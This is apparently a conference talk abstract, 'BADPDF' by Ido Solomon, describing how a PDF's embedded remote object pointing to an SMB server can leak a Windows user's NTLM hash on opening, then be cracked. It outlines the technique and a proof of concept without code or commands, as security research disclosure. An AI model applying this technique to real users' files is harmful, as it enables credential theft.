BADPDF – Stealing Windows Credentials via PDF Files

Ido Solomon

Playlists: 'gpn19' videos starting here / audio / related events

Microsoft NTLM is protocol is an authentication protocol used on networks that include systems running the Windows operating system and stand-alone systems. Despite Microsoft's implementation of Kerberos, NTLM is still in use in order to support older systems. Many exploits in the past targeted Microsoft Office and Windows OS internal functions in order to cause the leaking of Windows user's NTLM hashes, which can then be cracked and disclose the original passwords. Are those the only products vulnerable to NTLM credential theft? Find out how PDF files can be weaponized to automatically achieve NTLM hash leaks with no user interaction.

Shortly after it was reported that malicious actors can exploit a vulnerability in MS outlook to leak a Windows user’s NTLM hashes, our research team revealed that NTLM hash leak can be achieved via PDF files with no user interaction or exploitation. Rather than exploiting a vulnerability in Microsoft Office files or Outlook, attackers can weaponize a PDF file by exploiting a feature that allows embedding remote documents and files within it. By pointing the embedded object to a remote SMB server, the target automatically leaks credentials in the form of NTLM hashes when the PDF is opened.
In this presentation I will first cover the basic structure of a PDF file and its objects, in particular the Dictionary object where this vulnerability lies.
Next I will present our team’s Proof of Concept, injecting malicious code into a benign PDF file, weaponizing it, and causing an NTLM hash leak upon opening the file.
I will then discuss the impact of this attack, by showing the leaked NTLM hash captured on the remote SMB server and how it can be cracked to retrieve the victim’s original password.